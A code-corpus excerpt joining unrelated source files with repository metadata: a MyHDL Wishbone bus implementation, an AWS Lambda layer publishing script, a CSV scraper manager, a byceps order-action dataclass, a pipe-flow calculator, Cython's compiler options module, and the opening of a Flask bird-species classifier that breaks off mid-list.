            self.clk_i = self.clock
        if glbl is not None and glbl.reset is not None:
            self.reset = glbl.reset
            self.rst_i = self.reset
        self.cyc_i = Signal(bool(0))
        self.stb_i = Signal(bool(0))
        self.adr_i = Signal(intbv(0)[address_width:])
        self.we_i = Signal(bool(0))
        self.sel_i = Signal(bool(0))
        self.dat_i = Signal(intbv(0)[data_width:])
        # outputs from the peripherals
        self.dat_o = Signal(intbv(0)[data_width:])
        self.ack_o = Signal(bool(0))
        # per-peripheral output signals, combined by interconnect()
        self._pdat_o = []
        self._pack_o = []
        # testbench transactor timeout, in clock cycles
        self.timeout = 1111
        self._add_bus(name)

    def add_output_bus(self, dat, ack):
        """Register one peripheral's data/ack outputs for interconnect()."""
        self._pdat_o.append(dat)
        self._pack_o.append(ack)

    def interconnect(self):
        """ combine all the peripheral outputs

        OR-combines every registered peripheral's data and ack signals onto
        the shared dat_o/ack_o lines (only the addressed peripheral drives
        non-zero values, so OR-ing is a wired-or mux).
        """
        assert len(self._pdat_o) == len(self._pack_o)
        ndevs = len(self._pdat_o)
        wb = self

        @always_seq(self.clk_i.posedge, reset=self.rst_i)
        def rtl_or_combine():
            dats = 0
            acks = 0
            for ii in range(ndevs):
                dats = dats | wb._pdat_o[ii]
                acks = acks | wb._pack_o[ii]
            wb.dat_o.next = dats
            wb.ack_o.next = acks

        return rtl_or_combine

    def peripheral_regfile(self, regfile, name=''):
        """ memory-mapped wishbone peripheral interface

        Generates the logic that exposes *regfile* on this bus: address
        decode, read mux, write strobes, and a one-cycle-delayed ack.

        :param regfile: register file definition (provides get_reglist/
                        get_strobelist/get_assigns and base_address)
        :param name: optional peripheral name (currently unused here)
        :return: the MyHDL generators for the peripheral logic
        """
        # local alias
        wb = self     # register bus
        rf = regfile  # register file definition
        clock, reset = wb.clk_i, wb.rst_i
        # @todo: base address default needs to be revisited
        # if the base_address is not set, simply set to 0 for now ...
        base_address = regfile.base_address
        if base_address is None:
            base_address = 0
        # get the address list (al), register list (rl), read-only list (rol),
        # and the default list (dl).
        al, rl, rol, dl = rf.get_reglist()
        addr_list, regs_list = al, rl
        pwr, prd = rf.get_strobelist()
        nregs = len(regs_list)
        max_address = base_address + max(addr_list)
        lwb_do = Signal(intbv(0)[self.data_width:])
        # NOTE(review): lwb_wrd appears unused below — confirm before removal.
        (lwb_sel, lwb_acc, lwb_wr,
         lwb_wrd, lwb_ack,) = [Signal(bool(0)) for _ in range(5)]
        wb.add_output_bus(lwb_do, lwb_ack)
        num_ackcyc = 1   # the number of cycle delays after cyc_i
        ackcnt = Signal(intbv(num_ackcyc, min=0, max=num_ackcyc+1))
        newcyc = Signal(bool(0))
        if self._debug:
            # simulation-only trace of the bus signals each clock
            @instance
            def debug_check():
                print("base address {:4X}, max address {:4X}".format(
                    int(base_address), int(max_address)))
                while True:
                    assert clock is wb.clk_i is self.clock
                    assert reset is wb.rst_i is self.reset
                    yield clock.posedge
                    print("{:8d}: c:{}, r:{}, {} {} {} sel:{}, wr:{} n:{} "
                          "acnt {}, @{:04X}, i:{:02X} o:{:02X} ({:02X})".format(
                        now(), int(clock), int(reset),
                        int(wb.cyc_i), int(wb.we_i), int(wb.ack_o),
                        int(lwb_sel), int(lwb_wr),
                        int(newcyc), int(ackcnt), int(wb.adr_i),
                        int(wb.dat_i), int(wb.dat_o), int(lwb_do), ))

        @always_comb
        def rtl_assign():
            # bus access / write qualification
            lwb_acc.next = wb.cyc_i and wb.stb_i
            lwb_wr.next = wb.cyc_i and wb.stb_i and wb.we_i

        @always_seq(clock.posedge, reset=reset)
        def rtl_selected():
            # registered address decode: this peripheral owns
            # [base_address, max_address)
            if (wb.cyc_i and wb.adr_i >= base_address and
                wb.adr_i < max_address):
                lwb_sel.next = True
            else:
                lwb_sel.next = False

        @always_seq(clock.posedge, reset=reset)
        def rtl_bus_cycle():
            # set default, only active one cycle
            newcyc.next = False
            if wb.cyc_i:
                if ackcnt > 0:
                    ackcnt.next = ackcnt - 1
                    if ackcnt == 1:
                        newcyc.next = True
            else:
                ackcnt.next = num_ackcyc

        @always_comb
        def rtl_ack():
            if wb.cyc_i and newcyc:
                lwb_ack.next = True
            else:
                lwb_ack.next = False

        # @todo: scan the register list, if it is contiguous remove
        #    the base and use the offset directly to access the
        #    register list instead of the for loop
        # if rf.contiguous:
        #    @always_seq(rb.clk_i.posedge, reset=rb.rst_i)
        #    def rtl_read():
        # else:
        # Handle a bus read (transfer the addressed register to the
        # data bus) and generate the register read pulse (let the
        # peripheral know the register has been read).
        # @always_seq(clock.posedge, reset=reset)
        @always_comb
        def rtl_read():
            if lwb_sel and not lwb_wr and newcyc:
                for ii in range(nregs):
                    aa = addr_list[ii]
                    aa = aa + base_address
                    if wb.adr_i == aa:
                        lwb_do.next = regs_list[ii]
                        prd[ii].next = True
            else:
                lwb_do.next = 0
                for ii in range(nregs):
                    prd[ii].next = False

        # Handle a bus write (transfer the data bus to the addressed
        # register) and generate a register write pulse (let the
        # peripheral know the register has been written).
        @always(clock.posedge)
        def rtl_write():
            if reset == int(reset.active):
                # synchronous reset: load writable registers' defaults
                for ii in range(nregs):
                    ro = rol[ii]
                    dd = dl[ii]
                    if not ro:
                        regs_list[ii].next = dd
                    pwr[ii].next = False
            else:
                if lwb_wr and lwb_sel and newcyc:
                    for ii in range(nregs):
                        aa = addr_list[ii]
                        aa = aa + base_address
                        ro = rol[ii]
                        if not ro and wb.adr_i == aa:
                            regs_list[ii].next = wb.dat_i
                            pwr[ii].next = True
                else:
                    for ii in range(nregs):
                        pwr[ii].next = False

        # get the generators that assign the named bits
        gas = regfile.get_assigns()

        return instances()

    # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    def get_generic(self):
        """Return a Barebone bus with matching widths, clock, and reset."""
        generic = Barebone(Global(self.clock, self.reset),
                           data_width=self.data_width,
                           address_width=self.address_width)
        return generic

    def map_to_generic(self, generic):
        """Drive a generic (Barebone) bus from this Wishbone bus."""
        clock = self.clock
        wb, bb = self, generic
        inprog = Signal(bool(0))

        # the output signals need to be local and then the "interconnect"
        # will combine all the outputs back to the master(s)
        lwb_do = Signal(intbv(0)[self.data_width:])
        lwb_ack = Signal(bool(0))
        wb.add_output_bus(lwb_do, lwb_ack)

        @always_comb
        def rtl_assign():
            bb.write.next = wb.cyc_i and wb.we_i
            bb.read.next = wb.cyc_i and not wb.we_i
            bb.write_data.next = wb.dat_i
            lwb_do.next = bb.read_data
            # upper address bits select the peripheral, lower the memory
            bb.per_addr.next = wb.adr_i[:16]
            bb.mem_addr.next = wb.adr_i[16:]

        @always(clock.posedge)
        def rtl_ack():
            # single-cycle ack per bus cycle; inprog blocks re-acking
            if not lwb_ack and wb.cyc_i and not inprog:
                lwb_ack.next = True
                inprog.next = True
            elif lwb_ack and wb.cyc_i:
                lwb_ack.next = False
            elif not wb.cyc_i:
                inprog.next = False

        return rtl_assign, rtl_ack

    def map_from_generic(self, generic):
        """Drive this Wishbone bus from a generic (Barebone) bus.

        NOTE(review): only ``rtl_assign`` is returned; ``rtl_delay`` and
        ``rtl_done`` are defined but not returned — confirm whether they
        should be included in the returned generators.
        """
        clock = self.clock
        wb, bb = self, generic
        inprog = Signal(bool(0))
        iswrite = Signal(bool(0))

        @always_comb
        def rtl_assign():
            if bb.write or bb.read:
                wb.cyc_i.next = True
                wb.we_i.next = True if bb.write else False
            elif inprog:
                # hold the cycle until the transaction completes
                wb.cyc_i.next = True
                wb.we_i.next = True if iswrite else False
            else:
                wb.cyc_i.next = False
                wb.we_i.next = False
            wb.adr_i.next = concat(bb.per_addr, bb.reg_addr)
            wb.dat_i.next = bb.write_data
            bb.read_data.next = wb.dat_o

        @always(clock.posedge)
        def rtl_delay():
            # latch transaction-in-progress and its direction
            if not inprog and (bb.read or bb.write):
                inprog.next = True
                iswrite.next = bb.write
            if inprog and wb.ack_o:
                inprog.next = False
                iswrite.next = False

        @always_comb
        def rtl_done():
            bb.done.next = not inprog

        return rtl_assign

    # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    def writetrans(self, addr, val):
        """ write accessor for testbenches
        Drives one full Wishbone write cycle, waiting (up to
        ``self.timeout`` clocks) for the peripheral ack.
        Not convertible.
        """
        self._start_transaction(write=True, address=addr, data=val)
        # toggle the signals for the bus transaction
        yield self.clk_i.posedge
        self.adr_i.next = addr
        self.dat_i.next = self._write_data
        self.we_i.next = True
        self.cyc_i.next = True
        self.stb_i.next = True
        to = 0
        # wait for ack
        while not self.ack_o and to < self.timeout:
            yield self.clk_i.posedge
            to += 1
        self.we_i.next = False
        self.cyc_i.next = False
        self.stb_i.next = False
        yield self.clk_i.posedge
        self._end_transaction()

    def readtrans(self, addr):
        """ read accessor for testbenches
        Drives one full Wishbone read cycle and captures ``dat_o``.
        Not convertible.
        """
        self._start_transaction(write=False, address=addr)
        yield self.clk_i.posedge
        self.adr_i.next = addr
        self.cyc_i.next = True
        self.stb_i.next = True
        to = 0
        while not self.ack_o and to < self.timeout:
            yield self.clk_i.posedge
            to += 1
        self.cyc_i.next = False
        self.stb_i.next = False
        self._end_transaction(self.dat_o)

    def acktrans(self, data=None):
        """ acknowledge accessor for testbenches
        Pulses ``ack_o`` for one clock, optionally driving read data.
        :param data: optional value to place on ``dat_o``
        :return: MyHDL generator (yields one clock edge)
        """
        self.ack_o.next = True
        if data is not None:
            self.dat_o.next = data
        yield self.clk_i.posedge
        self.ack_o.next = False
| [
"chris.felton@gmail.com"
] | chris.felton@gmail.com |
5df4cb7698d616222b871122a1bd80d5a80a62ff | d5e279c64f7615cd14d82c59aca2ee17eef1c8f1 | /scripts/deploy-layer.py | 6830a56542322f06b17f3d9bd32892a6ce3a7194 | [] | no_license | kylebarron/cogeo-layer | d075ca12b95edf4731d89c2d68a548ec68c8a881 | f04d14ebf99dfcfa71ae5584a818956e91e8f0fa | refs/heads/master | 2021-04-18T14:25:31.567363 | 2020-03-24T03:08:34 | 2020-03-24T03:08:34 | 249,553,335 | 5 | 0 | null | 2020-03-23T23:25:28 | 2020-03-23T21:58:23 | null | UTF-8 | Python | false | false | 2,576 | py |
import click
import hashlib
from boto3.session import Session as boto3_session
# Regions the Lambda layer is published to (one publish per region).
AWS_REGIONS = [
    "eu-central-1",
    "us-east-1",
    "us-east-2",
    "us-west-1",
    "us-west-2",
]
def _md5(fname):
hash_md5 = hashlib.md5()
with open(fname, "rb") as f:
for chunk in iter(lambda: f.read(4096), b""):
hash_md5.update(chunk)
return hash_md5.hexdigest()
@click.command()
@click.argument('gdalversion', type=str)
@click.argument('pythonversion', type=str)
@click.argument('layername', type=str)
def main(gdalversion, pythonversion, layername):
    # (No docstring on purpose: click would surface it as CLI help text.)
    # Publish the local layer zip to every region in AWS_REGIONS, skipping
    # regions where the latest layer version already carries this zip's MD5.
    local_name = f"gdal{gdalversion}-py{pythonversion}-{layername}.zip"
    next_layer_sha = _md5(local_name)
    runtime = f"python{pythonversion}"
    gdalversion_nodot = gdalversion.replace(".", "")
    pythonversion_nodot = pythonversion.replace(".", "")
    layer_name = f"gdal{gdalversion_nodot}-py{pythonversion_nodot}-{layername}"
    # The MD5 is embedded in the description so later runs can detect changes.
    description = f"Lambda Layer with GDAL{gdalversion} - {runtime} - {next_layer_sha}"
    session = boto3_session()
    click.echo(f"Deploying {layer_name}", err=True)
    for region in AWS_REGIONS:
        click.echo(f"AWS Region: {region}", err=True)
        client = session.client("lambda", region_name=region)
        res = client.list_layer_versions(
            CompatibleRuntime=runtime, LayerName=layer_name
        )
        layers = res.get("LayerVersions")
        click.echo(f"Found {len(layers)} versions.", err=True)
        if layers:
            # Newest version first; its description ends with the zip's MD5.
            layer = layers[0]
            layer_sha = layer["Description"].split(" ")[-1]
        else:
            layer_sha = ""
        click.echo(f"Current SHA: {layer_sha}", err=True)
        click.echo(f"New SHA: {next_layer_sha}", err=True)
        if layer_sha == next_layer_sha:
            # Same content already deployed in this region.
            click.echo("No update needed", err=True)
            continue
        click.echo(f"Publishing new version", err=True)
        with open(local_name, 'rb') as zf:
            res = client.publish_layer_version(
                LayerName=layer_name,
                Content={"ZipFile": zf.read()},
                CompatibleRuntimes=[runtime],
                Description=description,
                LicenseInfo="MIT"
            )
        version = res["Version"]
        # Make the newly published version publicly consumable.
        click.echo(f"Adding permission", err=True)
        client.add_layer_version_permission(
            LayerName=layer_name,
            VersionNumber=version,
            StatementId='make_public',
            Action='lambda:GetLayerVersion',
            Principal='*',
        )


if __name__ == '__main__':
    main()
| [
"vincent.sarago@gmail.com"
] | vincent.sarago@gmail.com |
f9cfddcd3da8437fd43cbe1a9e37a49a32c199a0 | 0b406d2c041c76d9ef8789539e0e3af9a50e3613 | /Extract_refactor/WebScrapy/manager.py | 37fd76cb4a79a41b493987d4e7ca799edc0f8929 | [] | no_license | aise17/ExtractPdf | 221b47c5f0e75a823284b4f52981917962042592 | 7e1bfbc759cb7473d727574e5df78eaaac9fa8a4 | refs/heads/master | 2022-02-26T06:39:14.265795 | 2019-06-04T15:01:39 | 2019-06-04T15:01:39 | 184,154,301 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,329 | py | from Extract_refactor.settings import IMAGENES_PATH
from .web_info import WebInfo
import unicodecsv as csv
class Manager(WebInfo):
    """Imports URL lists from CSV and exports scrape results to CSV.

    NOTE(review): the files opened in open_book_writer/open_book_append are
    never explicitly closed (the csv writer keeps the handle alive) — confirm
    whether an explicit close/flush is needed before the process exits.
    """
    def __init__(self, ruta_entrada):
        # Example of the per-site result dict this class expects, e.g.:
        # {'status': 200, 'alexa': ..., 'language': ..., 'url': ...,
        #  'platform': [...], 'mail': ...}
        # NOTE(review): export() reads self.resultados, but it is never set
        # here — presumably WebInfo (or a scrape step) assigns it; verify,
        # otherwise export() raises AttributeError.
        self.urls_list = []
        self.writer = ''
        self.ruta_entrada = ruta_entrada
    def open_book_writer(self):
        # Create/overwrite the output CSV and write the header row.
        f = open('salida/' + self.ruta_entrada, 'wb')
        self.writer = csv.writer(f, lineterminator='\n', encoding='utf-8')
        self.writer.writerow(('url','alexa', 'status', 'platform', 'language', 'mail'))
    def open_book_append(self):
        # Re-open the output CSV in append mode (no header).
        f = open('salida/' + self.ruta_entrada, 'ab')
        self.writer = csv.writer(f, lineterminator='\n', encoding='utf-8')
    def export(self):
        # Append one result row from self.resultados to the open writer.
        self.writer.writerow((self.resultados['url'], self.resultados['alexa'], self.resultados['status'], self.resultados['platform'], self.resultados['language'], self.resultados['mail']))
    def imports(self):
        # Load every CSV row from media/<ruta_entrada> into self.urls_list.
        with open('media/' + self.ruta_entrada, 'rb') as f:
            reader = csv.reader(f, encoding='utf-8')
            for row in reader:
                self.urls_list.append(row)
        print (self.urls_list)
print (self.urls_list)
#manager = Manager()
#manager.imports()
| [
"sergio.martinez-g@hotmail.com"
] | sergio.martinez-g@hotmail.com |
7d1a8e1308c251ab8962fd8e55d64f1b6591f4cd | 0c0168a4676bce7453836a7509e7133044aa8975 | /byceps/services/shop/order/models/action.py | a522c5bf75985a56a31b5bdbfde5a96a124daac9 | [
"BSD-3-Clause"
] | permissive | byceps/byceps | 0aad3c4d974f76c6f8c3674d5539a80c9107b97a | eaee2b7fdc08c76c16ddf7f436110e0b5f1812e5 | refs/heads/main | 2023-09-01T04:03:13.365687 | 2023-09-01T03:28:18 | 2023-09-01T03:28:18 | 40,150,239 | 44 | 23 | BSD-3-Clause | 2023-05-16T18:41:32 | 2015-08-03T22:05:23 | Python | UTF-8 | Python | false | false | 565 | py | """
byceps.services.shop.order.models.action
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
:Copyright: 2014-2023 Jochen Kupperschmidt
:License: Revised BSD (see `LICENSE` file for details)
"""
from dataclasses import dataclass
from typing import Any
from uuid import UUID
from byceps.services.shop.article.models import ArticleID
from .order import PaymentState
# Free-form keyword parameters passed to an order action procedure.
ActionParameters = dict[str, Any]


@dataclass(frozen=True)
class Action:
    """An action to run for an article when an order reaches a payment state."""

    id: UUID
    # article this action is attached to
    article_id: ArticleID
    # payment state that triggers the action
    payment_state: PaymentState
    # name of the procedure to execute
    procedure_name: str
    # arguments handed to the procedure
    parameters: ActionParameters
| [
"homework@nwsnet.de"
] | homework@nwsnet.de |
2e0c98154ff9965f3b78d4ec24114cbfb88b9b4a | de24f83a5e3768a2638ebcf13cbe717e75740168 | /moodledata/vpl_data/63/usersdata/209/32491/submittedfiles/swamee.py | 4e0b7ced6a958750f520d5f31ba92b776a1694b6 | [] | no_license | rafaelperazzo/programacao-web | 95643423a35c44613b0f64bed05bd34780fe2436 | 170dd5440afb9ee68a973f3de13a99aa4c735d79 | refs/heads/master | 2021-01-12T14:06:25.773146 | 2017-12-22T16:05:45 | 2017-12-22T16:05:45 | 69,566,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 478 | py | # -*- coding: utf-8 -*-
import math
#COMECE SEU CÓDIGO AQUI
# Read the hydraulic inputs (friction factor f, pipe length L, flow rate Q,
# head loss DELTAH, kinematic viscosity V).
f=float(input('digite o valor f:'))
L=float(input('Digite o valor L:'))
Q=float(input('Digite o valor Q:'))
DELTAH=float(input('Digite o valor DELTAH:'))
V=float(input('digite o valor V:'))
g=9.81        # gravitational acceleration [m/s^2]
e=0.000002    # absolute pipe roughness [m]
# Pipe diameter from the Darcy-Weisbach head-loss relation solved for D.
D=((8*f*L*(Q**2))/((math.pi**2)*g*DELTAH))**(1/5)
# Reynolds number: Re = 4Q / (pi * D * V).
# Fix: the original divided only by pi (4*Q/math.pi*D*V multiplies by D and V).
Rey=4*Q/(math.pi*D*V)
# Swamee-Jain friction factor: 0.25 / [log10(e/(3.7 D) + 5.74/Re^0.9)]^2.
# Fixes: e/3.7*D multiplied by D instead of dividing, and the original line
# had an unbalanced parenthesis (SyntaxError).
k=0.25/((math.log10((e/(3.7*D))+(5.74/Rey**0.9)))**2)
print('O valor D é %.4f'%D)
print('O valor Rey é %.4f'%Rey)
print('O valor k é %f'%k)
"rafael.mota@ufca.edu.br"
] | rafael.mota@ufca.edu.br |
f111a9ff3e1407a7ee0c4f7393192a0f7880fc4e | 634fb5fe10e8f944da44ab31896acc8471ec5f18 | /hq_env/lib/python2.7/site-packages/Cython/Compiler/Options.py | 764c8868c7411e3a9fde58f88e3235ecd4146f9c | [] | no_license | dimagi/commcarehq-venv | 277d0b6fada24f2edd54f74850267201153412a7 | 2c52e3fb0f974cae5c5feaea1d5de851fe530c80 | refs/heads/master | 2021-01-18T14:05:47.931306 | 2015-07-20T10:10:41 | 2015-07-20T10:10:41 | 11,513,855 | 1 | 1 | null | 2015-07-20T10:10:41 | 2013-07-18T21:09:22 | Python | UTF-8 | Python | false | false | 8,499 | py | #
# Cython - Compilation-wide options and pragma declarations
#
# Module-level compilation-wide option flags, read by the rest of the
# compiler.  Each flag keeps its historical default.

# Perform lookups on builtin names only once, at module initialisation
# time.  This will prevent the module from getting imported if a
# builtin name that it uses cannot be found during initialisation.
cache_builtins = True

embed_pos_in_docstring = False
gcc_branch_hints = True

pre_import = None
docstrings = True

# Decref global variables in this module on exit for garbage collection.
# 0: None, 1+: interned objects, 2+: cdef globals, 3+: types objects
# Mostly for reducing noise for Valgrind, only executes at process exit
# (when all memory will be reclaimed anyways).
generate_cleanup_code = False

annotate = False

# This will abort the compilation on the first error occured rather than trying
# to keep going and printing further error messages.
fast_fail = False

# Make all warnings into errors.
warning_errors = False

# Make unknown names an error.  Python raises a NameError when
# encountering unknown names at runtime, whereas this option makes
# them a compile time error.  If you want full Python compatibility,
# you should disable this option and also 'cache_builtins'.
error_on_unknown_names = True

# This will convert statements of the form "for i in range(...)"
# to "for i from ..." when i is a cdef'd integer type, and the direction
# (i.e. sign of step) can be determined.
# WARNING: This may change the semantics if the range causes assignment to
# i to overflow. Specifically, if this option is set, an error will be
# raised before the loop is entered, wheras without this option the loop
# will execute until an overflowing value is encountered.
convert_range = True

# Enable this to allow one to write your_module.foo = ... to overwrite the
# definition if the cpdef function foo, at the cost of an extra dictionary
# lookup on every call.
# If this is 0 it simply creates a wrapper.
lookup_module_cpdef = False

# Whether or not to embed the Python interpreter, for use in making a
# standalone executable or calling from external libraries.
# This will provide a method which initalizes the interpreter and
# executes the body of this module.
embed = None

# Disables function redefinition, allowing all functions to be declared at
# module creation time. For legacy code only, needed for some circular imports.
disable_function_redefinition = False

# In previous iterations of Cython, globals() gave the first non-Cython module
# globals in the call stack.  Sage relies on this behavior for variable injection.
old_style_globals = False

# Allows cimporting from a pyx file without a pxd file.
cimport_from_pyx = False

# max # of dims for buffers -- set lower than number of dimensions in numpy, as
# slices are passed by value and involve a lot of copying
buffer_max_dims = 8
# Declare compiler directives
directive_defaults = {
    'boundscheck' : True,
    'nonecheck' : False,
    'initializedcheck' : True,
    'embedsignature' : False,
    'locals' : {},
    'auto_cpdef': False,
    'cdivision': False, # was True before 0.12
    'cdivision_warnings': False,
    'always_allow_keywords': False,
    'allow_none_for_extension_args': True,
    'wraparound' : True,
    'ccomplex' : False, # use C99/C++ for complex types and arith
    'callspec' : "",
    'final' : False,
    'internal' : False,
    'profile': False,
    'infer_types': None,
    'infer_types.verbose': False,
    'autotestdict': True,
    'autotestdict.cdef': False,
    'autotestdict.all': False,
    'language_level': 2,
    'fast_getattr': False, # Undocumented until we come up with a better way to handle this everywhere.
    'py2_import': False, # For backward compatibility of Cython's source code in Py3 source mode
    # set __file__ and/or __path__ to known source/target path at import time (instead of not having them available)
    'set_initial_path' : None, # SOURCEFILE or "/full/path/to/module"

    'warn': None,
    'warn.undeclared': False,
    'warn.unreachable': True,
    'warn.maybe_uninitialized': False,
    'warn.unused': False,
    'warn.unused_arg': False,
    'warn.unused_result': False,

    # optimizations
    'optimize.inline_defnode_calls': False,

    # remove unreachable code
    'remove_unreachable': True,

    # control flow debug directives
    'control_flow.dot_output': "", # Graphviz output filename
    'control_flow.dot_annotate_defs': False, # Annotate definitions

    # test support
    'test_assert_path_exists' : [],
    'test_fail_if_path_exists' : [],

    # experimental, subject to change
    'binding': None,
    'experimental_cpp_class_def': False
}

# Extra warning directives
extra_warnings = {
    'warn.maybe_uninitialized': True,
    'warn.unreachable': True,
    'warn.unused': True,
}

# Override types possibilities above, if needed
directive_types = {
    'final' : bool,  # final cdef classes and methods
    'internal' : bool,  # cdef class visibility in the module dict
    'infer_types' : bool, # values can be True/None/False
    'binding' : bool,
    'cfunc' : None, # decorators do not take directive value
    'ccall' : None,
    'cclass' : None,
    'returns' : type,
    'set_initial_path': str,
    }

# Infer the type of every remaining directive from its default value.
for key, val in directive_defaults.items():
    if key not in directive_types:
        directive_types[key] = type(val)

directive_scopes = { # defaults to available everywhere
    # 'module', 'function', 'class', 'with statement'
    'final' : ('cclass', 'function'),
    'internal' : ('cclass',),
    'autotestdict' : ('module',),
    'autotestdict.all' : ('module',),
    'autotestdict.cdef' : ('module',),
    'set_initial_path' : ('module',),
    'test_assert_path_exists' : ('function', 'class', 'cclass'),
    'test_fail_if_path_exists' : ('function', 'class', 'cclass'),
}


def parse_directive_value(name, value, relaxed_bool=False):
    """
    Parses value as an option value for the given name and returns
    the interpreted value. None is returned if the option does not exist.

    >>> print parse_directive_value('nonexisting', 'asdf asdfd')
    None
    >>> parse_directive_value('boundscheck', 'True')
    True
    >>> parse_directive_value('boundscheck', 'true')
    Traceback (most recent call last):
       ...
    ValueError: boundscheck directive must be set to True or False, got 'true'
    """
    # Fix: the local used to be named ``type``, shadowing the builtin that
    # is still needed elsewhere in this module.
    directive_type = directive_types.get(name)
    if not directive_type:
        # Unknown directive (or one that takes no value, mapped to None).
        return None
    orig_value = value
    if directive_type is bool:
        value = str(value)
        if value == 'True':
            return True
        if value == 'False':
            return False
        if relaxed_bool:
            # Accept common truthy/falsy spellings when explicitly allowed.
            value = value.lower()
            if value in ("true", "yes"):
                return True
            elif value in ("false", "no"):
                return False
        raise ValueError("%s directive must be set to True or False, got '%s'" % (
            name, orig_value))
    elif directive_type is int:
        try:
            return int(value)
        except ValueError:
            raise ValueError("%s directive must be set to an integer, got '%s'" % (
                name, orig_value))
    elif directive_type is str:
        return str(value)
    else:
        assert False
def parse_directive_list(s, relaxed_bool=False, ignore_unknown=False,
                         current_settings=None):
    """
    Parses a comma-separated list of pragma options. Whitespace
    is not considered.

    >>> parse_directive_list('      ')
    {}
    >>> (parse_directive_list('boundscheck=True') ==
    ... {'boundscheck': True})
    True
    >>> parse_directive_list('  asdf')
    Traceback (most recent call last):
       ...
    ValueError: Expected "=" in option "asdf"
    >>> parse_directive_list('boundscheck=hey')
    Traceback (most recent call last):
       ...
    ValueError: boundscheck directive must be set to True or False, got 'hey'
    >>> parse_directive_list('unknown=True')
    Traceback (most recent call last):
       ...
    ValueError: Unknown option: "unknown"
    """
    # Results are accumulated into *current_settings* when given, so callers
    # can layer several directive strings on top of each other.
    if current_settings is None:
        result = {}
    else:
        result = current_settings
    for item in s.split(','):
        item = item.strip()
        if not item:
            continue
        # Fix: was ``not '=' in item``; also the old comprehension reused the
        # name ``s``, shadowing the parameter.
        if '=' not in item:
            raise ValueError('Expected "=" in option "%s"' % item)
        name, value = [piece.strip() for piece in item.split('=', 1)]
        parsed_value = parse_directive_value(name, value, relaxed_bool=relaxed_bool)
        if parsed_value is None:
            if not ignore_unknown:
                raise ValueError('Unknown option: "%s"' % name)
        else:
            result[name] = parsed_value
    return result
| [
"dmyung@dimagi.com"
] | dmyung@dimagi.com |
5bbf71483d224e876d127a59536281a42b89502e | e28547b5bbdc00c2ebeba2f7f438570f2e050925 | /app.py | a1b73e96a96c87a6bdcf8c5ab10d0dff258c2a8d | [] | no_license | bridgecrew-perf7/bird-classification-deploy | e0ce0dc6eec0b5fe15c03fbfee9969676d2fbb96 | e7dae0ae9dfea8b30db2e83c4859dee290b5a719 | refs/heads/main | 2023-08-07T13:24:04.693214 | 2021-09-21T13:32:15 | 2021-09-21T13:32:15 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,782 | py | from __future__ import division, print_function
import torch
import torchvision.transforms as tt
from PIL import Image
import torch.nn as nn
from flask import Flask, redirect, url_for, request, render_template
from torchvision.transforms import transforms
from werkzeug.utils import secure_filename
# coding=utf-8
import sys
import os
import glob
import re
import numpy as np
def conv_block(in_channels, out_channels, pool=False):
    """Build one Conv(3x3, pad=1) -> BatchNorm -> ReLU stage.

    When ``pool`` is True, a 2x2 max-pool is appended, halving the
    spatial resolution. Returns the stage as an ``nn.Sequential``.
    """
    stage = [
        nn.Conv2d(in_channels, out_channels, kernel_size=3, padding=1),
        nn.BatchNorm2d(out_channels),
        nn.ReLU(inplace=True),
    ]
    if pool:
        stage.append(nn.MaxPool2d(2))
    return nn.Sequential(*stage)
class ResNet9(nn.Module):
    """ResNet9-style CNN: two residual stages over conv_block layers.

    Built for 3 x 64 x 64 inputs (the shapes noted below assume that),
    ending in an adaptive max-pool head with dropout and a linear
    classifier producing ``num_classes`` logits.
    """

    def __init__(self, in_channels, num_classes):
        super().__init__()
        # Feature extractor; comments give the per-sample activation shape
        # for a 64x64 input.
        self.conv1 = conv_block(in_channels, 64)         # 64 x 64 x 64
        self.conv2 = conv_block(64, 128, pool=True)      # 128 x 32 x 32
        self.res1 = nn.Sequential(
            conv_block(128, 128),
            conv_block(128, 128),
        )                                                # 128 x 32 x 32
        self.conv3 = conv_block(128, 256, pool=True)     # 256 x 16 x 16
        self.conv4 = conv_block(256, 512, pool=True)     # 512 x 8 x 8
        self.res2 = nn.Sequential(
            conv_block(512, 512),
            conv_block(512, 512),
        )                                                # 512 x 8 x 8
        self.classifier = nn.Sequential(
            nn.AdaptiveMaxPool2d(1),                     # 512 x 1 x 1
            nn.Flatten(),                                # 512
            nn.Dropout(0.2),
            nn.Linear(512, num_classes),
        )

    def forward(self, xb):
        """Return class logits of shape (batch, num_classes)."""
        x = self.conv2(self.conv1(xb))
        x = x + self.res1(x)    # first skip connection
        x = self.conv4(self.conv3(x))
        x = x + self.res2(x)    # second skip connection
        return self.classifier(x)
from gevent.pywsgi import WSGIServer

app = Flask(__name__)

# Load the trained network. torch.load() unpickles the *whole* model object
# (architecture + weights), so the ResNet9 class above must stay importable.
# The previous `model = ResNet9(3, 275)` built a throwaway instance that was
# immediately overwritten by this load; that dead construction is removed.
model = torch.load('cnn.pt', map_location='cpu')
print('Model loaded')

# Inference-time preprocessing: resize the short side to 64, crop to 64x64,
# then convert to a CHW float tensor.
# NOTE(review): RandomCrop makes predictions nondeterministic at inference
# time; CenterCrop is the usual choice here -- confirm this is intentional.
tts = tt.Compose([tt.Resize(64), tt.RandomCrop(64), tt.ToTensor()])
# Class labels for the 275 bird species the network was trained on.
# IMPORTANT: the order is significant -- index i corresponds to output
# logit i of the model; model_predict() indexes this list directly.
# NOTE(review): several entries carry the dataset's original typos
# ('BLACK & YELLOW bROADBILL', 'PAINTED BUNTIG', 'TOUCHAN', ...); they
# presumably mirror the training-data folder names and must stay as-is --
# confirm against the dataset before "fixing" any spelling.
l = ['AFRICAN CROWNED CRANE',
     'AFRICAN FIREFINCH',
     'ALBATROSS',
     'ALEXANDRINE PARAKEET',
     'AMERICAN AVOCET',
     'AMERICAN BITTERN',
     'AMERICAN COOT',
     'AMERICAN GOLDFINCH',
     'AMERICAN KESTREL',
     'AMERICAN PIPIT',
     'AMERICAN REDSTART',
     'ANHINGA',
     'ANNAS HUMMINGBIRD',
     'ANTBIRD',
     'ARARIPE MANAKIN',
     'ASIAN CRESTED IBIS',
     'BALD EAGLE',
     'BALI STARLING',
     'BALTIMORE ORIOLE',
     'BANANAQUIT',
     'BANDED BROADBILL',
     'BAR-TAILED GODWIT',
     'BARN OWL',
